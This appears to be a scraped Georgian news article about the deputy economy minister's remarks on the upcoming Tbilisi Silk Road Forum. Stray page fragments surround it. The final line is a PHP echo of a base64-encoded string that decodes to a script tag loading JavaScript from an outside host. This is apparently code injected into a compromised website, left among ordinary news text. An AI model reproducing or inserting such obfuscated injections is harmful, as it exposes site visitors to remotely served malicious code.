celsiusi
ავერსი საქკაბელი

„აბრეშუმის გზის ფორუმის“ მთავარი იდეა არის ის, რომ უფრო მეტად გავზარდოთ დაკავშირებადობა, და საქართველოს როლი, როგორც ჰაბის, ამ შემთხვევაში არის ძალიან მნიშვნელოვანი. შესაბამისად, ფორუმი, რომელიც საქართველოში უკვე მეოთხედ იმართება, ხელს შეუწყობს ქვეყნების უფრო მეტად ჩართულობას „შუა დერეფნის“ ინიციატივაში, – განაცხადა ეკონომიკის მინისტრის მოადგილემ, გენადი არველაძემ სასტუმრო „ბილტმორში“, სადაც დღეს „აბრეშუმის გზის ფორუმის“ საორგანიზაციო შტაბი გაიხსნა. ფორუმი 26-27 ოქტომბერს თბილისში გაიმართება და მასში მსოფლიოს 60-მდე ქვეყნის 2000-მდე სტუმარი მიიღებს მონაწილეობას.

გენადი არველაძის შეფასებით, ფორუმი აგრეთვე ხელს უწყობს ზოგადად ქვეყნის ცნობადობის და ასევე საქართველოს, როგორც მთავარი დამაკავშირებელი ქვეყნის, როლის გაზრდას.

„თბილისის აბრეშუმის გზის ფორუმი“ მიმდინარე წლის 26 ოქტომბერს ზაქარია ფალიაშვილის სახელობის ოპერისა და ბალეტის სახელმწიფო თეატრში ოფიციალურად გაიხსნება. ორდღიან მასშტაბურ ღონისძიებაში მონაწილეობას მიიღებენ მაღალი რანგის ოფიციალური პირები, ასევე საერთაშორისო ფინანსური ინსტიტუტებისა და ბიზნესის წარმომადგენლები. ფორუმის ფარგლებში დაგეგმილია თემატური სესიები ვაჭრობის, ტრანსპორტის, ენერგეტიკის, ტურიზმის, ციფრული და ფინანსური ტექნოლოგიების საკითხებზე, ასევე გაიმართება სესიები საქართველოს საინვესტიციო შესაძლებლობების შესახებ და შედგება ორმხრივი ბიზნესშეხვედრები.

აბრეშუმის გზის ფორუმი საქართველოში მეოთხედ იმართება.

ინფორმაციას ეკონომიკის სამინისტროს პრესსამსახური ავრცელებს.

224
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");